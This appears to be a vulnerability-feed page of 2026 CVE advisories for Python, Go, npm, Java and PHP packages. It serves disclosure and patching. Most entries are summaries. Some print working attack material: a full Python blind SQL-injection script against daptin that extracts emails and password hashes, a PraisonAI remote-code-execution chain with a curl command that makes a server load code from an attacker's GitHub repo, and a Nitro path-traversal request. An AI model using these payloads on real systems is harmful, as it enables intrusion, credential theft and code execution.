CVE-2026-42587 Maven HIGH PATCH GHSA This Week

Decompression bomb protection bypass in Netty's HttpContentDecompressor and DelegatingDecompressorFrameListener allows remote unauthenticated attackers to trigger out-of-memory denial of service by switching Content-Encoding from gzip to brotli, zstd, or snappy. The configured maxAllocation parameter correctly limits gzip/deflate decompression but is silently ignored for these alternative encodings, enabling attackers to decompress gigabytes of data from kilobyte-sized payloads. Affects both HTTP/1.1 (netty-codec-http) and HTTP/2 (netty-codec-http2) implementations. CVSS 7.5 (High) with network vector, low complexity, and no authentication required. Vendor-released patches available: versions 4.1.133.Final and 4.2.13.Final. No active exploitation confirmed at time of analysis, but publicly disclosed proof-of-concept demonstrates trivial header-based bypass requiring only changing 'Content-Encoding: gzip' to 'Content-Encoding: br'.

Denial Of Service Java Python
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-44373 npm MEDIUM PATCH GHSA This Month

A proxy route rule like: ```ts routeRules: { "/api/orders/**": { proxy: { to: "http://upstream/orders/**" } } } ``` is intended to limit the proxy to URLs under `/api/orders/`. Before the patch, an attacker could bypass that scope by sending percent-encoded path traversal (`..%2f`) in the URL, causing Nitro to forward a request that the upstream resolved outside the configured scope. Example exploit: ``` GET /api/orders/..%2fadmin%2fconfig.json ``` Nitro sees `..%2f` as opaque characters at match time, the `/api/orders/**` rule matched, and the raw path was forwarded to the upstream as `/orders/..%2fadmin/config.json`. An upstream that decodes `%2F` to `/` then resolved `..` and can serve `/admin/config.json` outside the intended scope. ### Are you affected? Users may be affected if **ALL** of the following are true: 1. Their project uses Nitro's `routeRules` with a `proxy` entry (`{ proxy: { to: "..." } }`). 2. The proxy `to` value uses a `/**` wildcard suffix to forward sub-paths. 3. The **upstream** behind the proxy decodes `%2F` as `/` before routing or filesystem lookup. 4. Proxy route rules are _not_ handled natively at CDN (nitro v3 and vercel) Whether the bypass actually leaks data depends on the upstream. Modern JS frameworks keep `%2F` opaque per RFC 3986 and are safe by construction. - **Safe examples:** H3 v2, Express v5, Hono v4 - modern JS frameworks keep `%2F` opaque per RFC 3986. - **Vulnerable examples:** naive imlementations that decodes the URL, static file servers, CGI dispatchers, Python `os.path`-based routing, anything sitting behind another layer that decodes `%2F` (common in microservice meshes). ## Impact Any HTTP path reachable from the Nitro server to the upstream could be requested, regardless of the configured `/**` scope. In typical deployments (API gateway, BFF, microservice proxy) this could expose internal admin endpoints, secrets endpoints, or other services the developer believed the scope rule fenced off. ## Patched versions Upgrade to one of: - [2.13.4](https://github.com/nitrojs/nitro/releases/tag/v2.13.4) or later (https://github.com/nitrojs/nitro/pull/4223) - [3.0.260429-beta](https://github.com/nitrojs/nitro/releases/tag/v3.0.260429-beta) or later (https://github.com/nitrojs/nitro/pull/4222) The fix canonicalizes the incoming pathname before building the upstream URL and rejects requests with `400 Bad Request` if the resolved path would escape the rule's base. The bytes forwarded upstream are unchanged when the request is allowed. > Note: the fix assumes the upstream does not double-decode percent-encoding. If your upstream decodes twice (`%252F → %2F → /`), it remains your responsibility to harden it. **Single-decode is standard**. ## Credits Reported by [@mHe4am](https://github.com/mHe4am) ([@he4am on HackerOne](https://hackerone.com/he4am)) via the [Vercel Open Source](https://hackerone.com/vercel-open-source?type=team) program.

Python Path Traversal
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44349 Go HIGH PATCH GHSA This Week

## Summary `processFuzzySearch` in `server/resource/resource_findallpaginated.go:1484` splits the user-supplied `column` parameter by comma and interpolates each segment directly into `goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col))` raw SQL with no column whitelist check. The entry point is `GET /api/<entity>` with `operator=fuzzy` (or `fuzzy_any`, `fuzzy_all`). Any authenticated user - including one who self-registered with no admin involvement - can read the entire database. --- ## Details At `resource_findallpaginated.go:1761`, when the operator is `fuzzy`, `fuzzy_any`, or `fuzzy_all`, execution routes to `processFuzzySearch` (line 1763) before `processQueryFilter` (line 1780). `processQueryFilter` is the only path that calls `GetColumnByName` (line 1351), which validates column names against the table schema. The fuzzy branch never reaches that check. Inside `processFuzzySearch` (line 1484), `filterQuery.ColumnName` is split by comma. After `strings.TrimSpace` (line 1486), each segment is routed to a DB-driver-specific function. The injectable sink reached depends on the driver and the `fuzzy_options.fallback_mode` field. **SQLite** (`processFuzzySearchSQLite`, lines 1632-1676) uses `goqu.L` in all code paths - no `fallback_mode` required: - `goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col), ...)` - line 1650/1657 **PostgreSQL, MySQL, MSSQL** default to `goqu.Ex` (identifier-quoted, not injectable). The `goqu.L` sink is only reached when the attacker supplies a specific `fuzzy_options.fallback_mode` value in the HTTP `query` JSON: - PostgreSQL `word_boundary` mode (line 1540): `goqu.L(fmt.Sprintf("%s ~* ?", prefix+col), ...)` - MySQL `soundex` mode (line 1598): `goqu.L(fmt.Sprintf("SOUNDEX(%s) = SOUNDEX(?)", prefix+col), ...)` - MSSQL `soundex` mode (line 1694): `goqu.L(fmt.Sprintf("DIFFERENCE(%s, ?) >= 3", prefix+col), ...)` `fuzzy_options` is deserialized from the HTTP request at line 243 (`json.Unmarshal([]byte(query[0]), &queries)`) - it is fully attacker-controlled. `goqu.L` emits its first argument as a raw SQL literal. The column position uses `%s` string formatting, not a bound parameter. `prefix` is fixed at line 351 as `dbResource.model.GetName() + "."` - for `/api/world` this is `"world."`. Against SQLite, an attacker-supplied column value of `reference_id) OR 1=1 OR LOWER(world.reference_id` expands in the WHERE clause to `LOWER(world.reference_id) OR 1=1 OR LOWER(world.reference_id) LIKE ?`. Against PostgreSQL (where `reference_id` is stored as `bytea`), the `~*` regex operator requires a text-type column; the attack targets a `varchar` column instead (e.g., `table_name`) with an adapted injection template. **Relation to GHSA-rw2c-8rfq-gwfv**: That patch modified `resource_aggregate.go` to fix `/aggregate/:typename`. This vulnerability is in `resource_findallpaginated.go` on the `/api/<entity>` fuzzy path - different file, different endpoint, different operator. The existing patch does not cover this path. **Tested:** SQLite injection dynamically confirmed (boolean-blind extraction, email extracted). PostgreSQL `word_boundary` injection dynamically confirmed (baseline=0 rows, tautology=5 rows, email=`guest@cms.go` extracted via text column). MySQL and MSSQL confirmed by code review; MySQL binary panics on initialization in the test harness (unrelated daptin bug), dynamic verification not performed. **Fix**: Add a `GetColumnByName` whitelist check in `processFuzzySearch` (line 1484) before the comma-split, matching the pattern in `processQueryFilter:1351`. All four DB driver sinks require fixing. --- ## PoC **Environment:** ```bash git clone https://github.com/daptin/daptin cd daptin git checkout 5d3214244890989eceefa694bfc976ef11458721 go build -o daptin-server . ./daptin-server # listens on :6336, SQLite backend by default ``` **poc.py** (Python 3, no dependencies): ```python import json, urllib.request, urllib.parse BASE = "http://localhost:6336" def post(path, body): req = urllib.request.Request(BASE + path, json.dumps(body).encode(), {"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- ## Impact **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

SQLi PostgreSQL Python Oracle Apple
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-44334 PyPI HIGH PATCH GHSA This Week

## TL;DR CVE-2026-40287's fix gated `tools.py` auto-import behind `PRAISONAI_ALLOW_LOCAL_TOOLS=true` in **two** files (`tool_resolver.py`, `api/call.py`). A **third** import sink in `praisonai/templates/tool_override.py` was missed and remains unguarded. It is reached by the recipe runner on every recipe execution and is **remotely** triggerable through `POST /v1/recipes/run` with a `recipe` value pointing at any local absolute path *or* any GitHub repo (because `SecurityConfig.allow_any_github` defaults to `True`). The attacker drops a `tools.py` next to `TEMPLATE.yaml`; the server `exec_module()`s it. No auth required by default, no environment opt-in required. ## Patch coverage gap CVE-2026-40287 was fixed in v4.5.139 by adding an env-var gate at: | File | Line | Gate | |---|---|---| | `praisonai/tool_resolver.py` | 77 | `if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":` | | `praisonai/api/call.py` | 80 | same | But the equivalent sinks in `praisonai/templates/tool_override.py` were **not** patched: ```python # tool_override.py - create_tool_registry_with_overrides() 332 cwd_tools_py = Path.cwd() / "tools.py" 333 if cwd_tools_py.exists(): 334 try: 335 tools = loader.load_from_file(str(cwd_tools_py)) # <-- exec_module 336 registry.update(tools) 337 except Exception: 338 pass 339 341 # 4. Template-local tools.py 342 if template_dir: 343 tools_py = Path(template_dir) / "tools.py" 344 if tools_py.exists(): 345 try: 346 tools = loader.load_from_file(str(tools_py)) # <-- exec_module 347 registry.update(tools) 348 except Exception: 349 pass ``` `load_from_file` (line 84-94) ends in `spec.loader.exec_module(module)` with no allowlist, no signature check, no env gate. Both call sites run unconditionally on every recipe execution. ## Attack chain ``` HTTP POST /v1/recipes/run body: {"recipe": "<abs path>" | "github:<owner>/<repo>/<recipe>"} │ ▼ recipe/serve.py:483 run_recipe(request) ← auth=none default │ ▼ recipe/core.py:215 recipe.run(name, ...) │ ▼ recipe/core.py:686 _load_recipe(name) └─ ".." check only; absolute paths and URIs allowed │ ▼ templates/loader.py:94 TemplateLoader.load(uri) │ ▼ templates/security.py:130 is_source_allowed("github:*") └─ allow_any_github=True default → returns True │ ▼ templates/registry.py fetch repo from raw.githubusercontent.com → cache dir │ ▼ templates/security.py:215 validate_template_directory(cached.path) └─ .py is in allowed_extensions → tools.py kept │ ▼ recipe/core.py:887 _execute_recipe(recipe_config, ...) │ ▼ recipe/core.py:943 create_tool_registry_with_overrides( include_defaults=True, template_dir=recipe_config.path) │ ▼ templates/tool_override.py:341-349 load_from_file(template_dir/tools.py) │ ▼ templates/tool_override.py:94 spec.loader.exec_module(module) ← RCE ``` The tool registry build runs *before* any LLM/agent step, so `OPENAI_API_KEY` and similar are not required. A recipe with an empty `workflow.steps: []` is sufficient - the payload fires during registry construction. ## Confirmed execution (2026-04-25, praisonai 4.6.31) ``` SERVER stdout (PID 43784): Uvicorn running on http://127.0.0.1:8765 127.0.0.1 - POST /v1/recipes/run HTTP/1.1 [CVE-2026-40287-bypass] RCE fired. Marker written to: …/praisonai_pwn_1777094071.txt 127.0.0.1 - "POST /v1/recipes/run" 500 Internal Server Error Marker file: pid: 43784 ← matches server PID argv: ['server.py'] ← server process, not exploit ``` The 500 response is a downstream side-effect of `workflow.steps: []` failing to construct a runnable workflow; the `exec_module(tools.py)` call runs *before* that error. The attacker payload has already executed in the server process by the time the 500 is sent. ## Reproduction (local-path variant) Files under `pocs/praisonai-cve-2026-40287-bypass/`: - [evil_recipe/TEMPLATE.yaml](https://github.com/user-attachments/files/27079207/TEMPLATE.yaml) - minimal recipe metadata - [evil_recipe/tools.py](https://github.com/user-attachments/files/27079210/tools.py) - payload (writes a marker file in tempdir) - [server.py](https://github.com/user-attachments/files/27079211/server.py) - starts `praisonai.recipe.serve.create_app({})` on `127.0.0.1:8765` (default `auth: none`) - [exploit.py](https://github.com/user-attachments/files/27079214/exploit.py) - single POST to `/v1/recipes/run` ```bash pip install 'praisonai[serve]==4.6.31' # Terminal 1 python server.py # Terminal 2 python exploit.py ``` Expected: server stdout shows `[CVE-2026-40287-bypass] RCE fired.`; a `praisonai_pwn_<timestamp>.txt` file appears in the system temp directory containing user, host, pid, cwd captured from inside the server process. ## Reproduction (remote GitHub variant) ```bash # Push evil_recipe/ to https://github.com/<you>/poc-recipe (public repo) curl -X POST http://target:8765/v1/recipes/run \ -H 'Content-Type: application/json' \ -d '{"recipe":"github:<you>/poc-recipe/poc-recipe"}' ``` No filesystem prerequisite on the target. Triggers because `SecurityConfig.allow_any_github` (templates/security.py:30) defaults to `True`.

Python Code Injection RCE
NVD GitHub
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-44244 PyPI HIGH POC PATCH GHSA This Week

Arbitrary code execution via Git hook redirection in GitPython 3.1.48 and earlier allows local authenticated users to inject malicious core.hooksPath configuration through newline characters in config_writer().set_value(). Publicly available exploit code exists. The vulnerability enables persistent repository poisoning where attacker-controlled hooks execute with the privileges of any user performing Git operations (commit, merge, checkout) on the poisoned repository. Particularly dangerous in multi-tenant environments like MLRun, DVC, MLflow, or Kedro where shared repositories enable privilege escalation across user contexts. Fixed in GitPython 3.1.49.

Python Code Injection RCE Suse
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-42561 PyPI HIGH PATCH GHSA This Week

CPU exhaustion in python-multipart allows remote unauthenticated attackers to cause denial of service through crafted multipart/form-data requests with unbounded header blocks. Applications using Starlette, FastAPI, or other ASGI frameworks that parse attacker-controlled file uploads are vulnerable to worker thread starvation and event-loop blocking. Vendor-released patch available in version 0.0.27, which enforces default limits on both header count and individual header size during multipart parsing.

Denial Of Service Python
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-42559 LIB HIGH POC PATCH GHSA This Week

DNS rebinding in rmcp Rust crate allows malicious websites to control local MCP servers and achieve arbitrary code execution through exposed developer tools. Fixed in version 1.4.0 via Host header validation with loopback-only default allowlist. The vulnerability affects Streamable HTTP server transport only (stdio and child-process transports unaffected). Vendor-released patch available (PR #764, commit 8e22aa2). Similar vulnerabilities patched across TypeScript, Python, Go, and Java MCP SDKs indicate coordinated disclosure. CVSS 8.8 (network vector, low complexity, requires user interaction) reflects browser-mediated attack requiring victim to visit attacker site.

Python RCE Java Nginx
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44223 PyPI MEDIUM PATCH GHSA This Month

### Summary The `extract_hidden_states` speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a `RuntimeError` that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (`repetition_penalty`, `frequency_penalty`, or `presence_penalty`). A single request with a penalty parameter (e.g., `"repetition_penalty": 1.1`) is sufficient to crash the server. The crash is deterministic and immediate - no concurrency, race condition, or special workload is required. ### Details In vLLM v0.17.0, the `extract_hidden_states` proposer's `propose()` method returned `sampled_token_ids.unsqueeze(-1)`, producing a tensor of shape `(batch_size, 1)`. In [PR #37013](https://github.com/vllm-project/vllm/pull/37013) (first released in v0.18.0), the KV connector interface was refactored out of `propose()`. The return type changed from `tuple[Tensor, KVConnectorOutput | None]` to `Tensor`, and the `.unsqueeze(-1)` call was removed along with the KV connector output: ```python # Before (v0.17.0): return sampled_token_ids.unsqueeze(-1), kv_connector_output # shape (batch_size, 1) # After (v0.18.0+): return sampled_token_ids # shape (batch_size, 2) after first decode step ``` The refactor missed that `sampled_token_ids` changed semantics between the first and subsequent decode steps. After the first decode step, the rejection sampler allocates its output as `(batch_size, max_spec_len + 1)`. With `num_speculative_tokens=1`, this produces shape `(batch_size, 2)` instead of the expected `(batch_size, 1)`, causing a broadcast shape mismatch during penalty application. ### Impact Any vLLM deployment between v0.18.0 and v0.19.1 (inclusive) configured with `extract_hidden_states` speculative decoding is affected. A single API request containing any penalty parameter immediately and permanently crashes the EngineCore process, resulting in complete loss of service availability. ### Patches Fixed in [PR #38610](https://github.com/vllm-project/vllm/pull/38610), first included in vLLM v0.20.0. The fix slices the return value to `sampled_token_ids[:, :1]`, ensuring the correct `(batch_size, 1)` shape regardless of the rejection sampler's output dimensions. ### Workarounds - Upgrade to vLLM v0.20.0 or later. - If upgrading is not possible, avoid using `extract_hidden_states` as the speculative decoding method on affected versions. - Alternatively, reject or strip penalty parameters (`repetition_penalty`, `frequency_penalty`, `presence_penalty`) from incoming requests at an API gateway before they reach vLLM.

Python Denial Of Service
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44307 PyPI HIGH PATCH GHSA This Week

Path traversal in Mako Templates (Python library) on Windows platforms allows attackers to read arbitrary files outside configured template directories via backslash-based directory traversal sequences. Affects Mako versions ≤1.3.11 when applications accept user-controlled template names on Windows systems. Vendor-released patch available in version 1.3.12 (confirmed by GitHub commit 72e10c5). No public exploit code identified at time of analysis, though exploitation conditions are straightforward when prerequisites are met.

Python Microsoft Path Traversal Suse Red Hat
NVD GitHub
CVSS 4.0
8.7
EPSS
0.2%
CVE-2026-42545 PyPI MEDIUM PATCH GHSA This Month

Granian worker process aborts when a WSGI application returns invalid HTTP response header names or values due to unhandled panic in the header conversion path. An attacker who can influence WSGI application output, such as by injecting user-controlled data into response headers like Location or Content-Disposition, can trigger worker process denial of service. The vulnerability affects Granian versions 0.2.0 through 2.7.3; patch available in version 2.7.4. Proof of concept demonstrates crashes via headers containing spaces, CRLF injection, or null bytes.

Python Denial Of Service
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-42544 PyPI HIGH PATCH GHSA This Week

Granian ASGI server suffers remote denial of service when unauthenticated attackers send malformed WebSocket upgrade requests containing non-ASCII bytes in the Sec-WebSocket-Protocol header, causing worker process termination. Each crafted request kills one worker process; sequential requests across all workers achieve complete service outage. The vulnerability exists in Granian's pre-application WebSocket scope construction (src/asgi/utils.rs), making application-layer defenses ineffective. Publicly available exploit code exists with complete proof-of-concept demonstrating the attack. Vendor-released patch 2.7.4 addresses the issue for affected versions 1.2.0 through 2.7.3.

Python Denial Of Service
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-43948 PyPI CRITICAL PATCH GHSA Act Now

Complete account takeover in wger Python fitness management platform allows authenticated gym managers with no gym assignment (gym=None) to reset passwords of any other unaffiliated user and receive the new plaintext password in the HTTP response body. The vulnerability stems from a Django ORM authorization check that incorrectly evaluates None != None as False, bypassing the tenant isolation guard. Newly registered users default to gym=None state, making every public-registration wger deployment vulnerable. CVSS 9.9 Critical severity with scope change (cross-tenant impersonation). GitHub advisory GHSA-mhc8-p3jx-84mm confirms exploitation requires only low privilege (delegated gym.manage_gym permission) with no user interaction, enabling permanent victim lockout as original passwords are invalidated.

Authentication Bypass Python Docker
NVD GitHub
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-44243 PyPI HIGH POC PATCH GHSA This Week

Path traversal in GitPython versions ≤3.1.47 enables arbitrary file write and deletion outside repository boundaries when applications pass attacker-controlled reference paths to reference creation, rename, or delete operations. A fully-functional proof-of-concept demonstrates successful exploitation by crafting reference names with '../../../' sequences to escape the `.git` directory and manipulate files with the process owner's permissions. Applications exposing GitPython reference APIs to user input-particularly Git automation services, CI/CD pipelines, and multi-tenant developer platforms-are at immediate risk, as no authentication is required at the library boundary. Fixed in version 3.1.48 per GitHub advisory GHSA-7545-fcxq-7j24.

Python Denial Of Service Path Traversal Suse Red Hat
NVD GitHub VulDB
CVSS 4.0
7.8
EPSS
0.1%
CVE-2026-44304 PyPI HIGH PATCH GHSA This Week

LDAP filter injection in Netflix Lemur certificate management platform allows authenticated users with valid LDAP credentials to escalate privileges to administrator by injecting metacharacters into the username field during login. Attackers manipulate group membership queries to gain unauthorized admin roles, enabling access to all certificates, private keys via /certificates/<id>/key endpoint, and CA configurations. Vendor-released patch confirmed in version 1.9.0 (GitHub advisory GHSA-3r34-vq8m-39gh). CVSS 8.1 indicates high confidentiality and integrity impact with low attack complexity from network-authenticated attackers. No public exploit code identified at time of analysis, though detailed reproduction steps exist in the advisory.

Authentication Bypass Python Privilege Escalation LDAP Code Injection
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-44305 PyPI MEDIUM PATCH GHSA This Month

Man-in-the-middle attacks can intercept LDAP credentials in Lemur when LDAP TLS is enabled because the authentication module globally disables TLS certificate verification using `ldap.OPT_X_TLS_NEVER`. Attackers positioned between Lemur and the LDAP server can capture plaintext usernames and passwords, modify LDAP group responses to grant admin access, and compromise the entire PKI infrastructure managed by Lemur. The vulnerability affects Lemur versions before 1.9.0 and is confirmed fixed in version 1.9.0.

Python RCE OpenSSL
NVD GitHub
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-44226 PyPI MEDIUM PATCH GHSA This Month

PyLoad-ng WebUI discloses internal Python stack traces and source file paths to unauthenticated remote attackers via a global exception handler on the `/web/<path:filename>` endpoint. An attacker can request non-existent templates or craft malformed requests to trigger server exceptions and extract implementation details in HTTP responses without authentication. This information disclosure facilitates reconnaissance for follow-on attacks but does not enable direct code execution or data theft.

Python Information Disclosure
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-33441 HIGH PATCH This Week

Malformed reference links in Mistune 3.2.0 trigger algorithmic complexity attacks in the parse_link_title() function, causing 100% CPU consumption and permanent process hangs. The vulnerability affects Python applications processing untrusted Markdown content, enabling remote denial-of-service through minimal-size payloads (the provided POC is under 200 bytes). A publicly available proof-of-concept demonstrates consistent exploitation discovered via coverage-guided fuzzing. Vendor patch 3.2.1 addresses the issue by implementing parsing limits and defensive checks.

Suse Denial Of Service Python
NVD GitHub
CVE-2026-33079 PyPI HIGH PATCH GHSA This Week

Regular Expression Denial of Service in mistune's link title parser enables attackers to freeze Python applications with 58-byte Markdown payloads. The LINK_TITLE_RE regex in mistune 3.0.0a1 through 3.2.0 exhibits catastrophic backtracking (O(2^N) time complexity) when parsing link titles with repeated escaped punctuation patterns, blocking a parser thread for approximately 6 seconds on modern hardware with exponential growth per additional byte pair. Publicly available exploit code exists (demonstrated in the GitHub advisory with working PoC), enabling trivial weaponization against web applications, documentation systems, Jupyter tooling, and API endpoints that process user-supplied Markdown. CVSS 8.7 (CVSS:4.0/AV:N/AC:L/PR:N/UI:N/VA:H) reflects the network-accessible, zero-prerequisite nature of the attack, though the High availability impact assumes single-threaded parsing or resource-constrained environments.

Denial Of Service Apple Python
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-29090 PyPI CRITICAL POC PATCH GHSA Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.

PostgreSQL Python SQLi RCE
NVD GitHub
CVSS 4.0
9.0
EPSS
0.0%
CVE-2026-29080 PyPI CRITICAL POC PATCH GHSA Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

SQLi PostgreSQL Java Python Oracle +1
NVD GitHub
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-44222 PyPI MEDIUM PATCH GHSA This Month

Remote denial of service in vLLM 0.6.1 through 0.19.x allows unauthenticated attackers to crash worker processes by sending text-only prompts containing special multimodal placeholder tokens (e.g., '<|vision_start|><|image_pad|><|vision_end|>') without corresponding image or video data. The vulnerability stems from unprotected array indexing in the input position computation layer when processing vision tokens, causing an IndexError that terminates the worker and degrades service availability. A single malicious request can trigger the fault.

Python Denial Of Service
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44220 PyPI LOW PATCH GHSA Monitor

The discover_pipeline_files() function in ciguard v0.8.0-0.8.1 follows symlinks during directory traversal without validating that discovered paths remain within the scan root, allowing an attacker who plants symlinks in a scanned directory to cause the MCP server to leak file paths and contents from sensitive locations such as ~/.aws/, ~/.config/, and /etc/. This information disclosure vulnerability affects users of ciguard integrated with Claude Desktop, Claude Code, or Cursor, and is patched in v0.8.2 with default symlink following disabled and path validation applied.

Python Information Disclosure
NVD GitHub
CVSS 3.1
3.2
EPSS
0.0%
CVE-2026-43884 PHP HIGH PATCH GHSA This Week

Server-Side Request Forgery (SSRF) in AVideo versions up to 29.0 allows authenticated attackers to exfiltrate cloud metadata credentials and access internal services via HTTP redirect bypass and DNS rebinding attacks. Two endpoints in AVideo's AI plugin and EPG parser validate user-supplied URLs using isSSRFSafeURL() but then fetch them with file_get_contents() using PHP's default automatic redirect following. An attacker supplies a URL to a controlled server returning a 302 redirect to internal resources (e.g., AWS instance metadata at 169.254.169.254), bypassing SSRF protections since only the initial URL is validated. Vendor-released patch available via GitHub commit 603e7bf7. CVSS 7.7 reflects Changed Scope due to cross-boundary access to cloud infrastructure credentials.

Python SSRF PHP
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-42607 PHP CRITICAL POC PATCH GHSA Act Now

Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.

Microsoft PHP CSRF Python RCE +2
NVD GitHub Exploit-DB VulDB
CVSS 3.1
9.1
EPSS
0.2%
CVE-2026-43891 PyPI HIGH PATCH GHSA This Week

Arbitrary local file disclosure in changedetection.io allows remote unauthenticated attackers to read sensitive system files via crafted backup archives. When a malicious backup ZIP is uploaded and restored, the application trusts attacker-controlled paths in the history.txt file, enabling reads of files like /etc/passwd, environment variables, application secrets, and mounted Docker volumes through the Preview UI or history API. This vulnerability (CVSS 7.5) affects all versions through 0.54.10, with fix available in 0.55.1. No active exploitation (KEV) confirmed, but a detailed proof-of-concept exists demonstrating the complete attack chain from backup modification to file exfiltration. EPSS data not available, but the combination of network attack vector, no authentication requirement, and public exploit code makes this a priority for immediate patching.

Python Docker RCE
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-42314 PyPI MEDIUM PATCH GHSA This Month

Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces `../` with `_`, but the pattern `....//` bypasses this filter by becoming `.._` after replacement, leaving exploitable `..` sequences that the OS later resolves. CVSS 6.5 (network-accessible, low complexity, requires low-privilege authentication, high integrity impact). Publicly available proof-of-concept code demonstrates exploitation against default credentials.

Python Path Traversal
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-42304 PyPI HIGH PATCH GHSA This Week

Remote denial of service in Twisted's DNS name decompression (twisted.names module) allows unauthenticated attackers to freeze the single-threaded reactor by sending a crafted TCP DNS packet with deeply chained compression pointers and thousands of questions. Publicly available exploit code exists. Despite high CVSS score (7.5), real-world impact is limited to applications using the twisted.names DNS server-not the broader Twisted framework. Vendor-released patch available in version 26.4.0rc2.

Denial Of Service Python Suse
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-42266 PyPI HIGH PATCH GHSA This Week

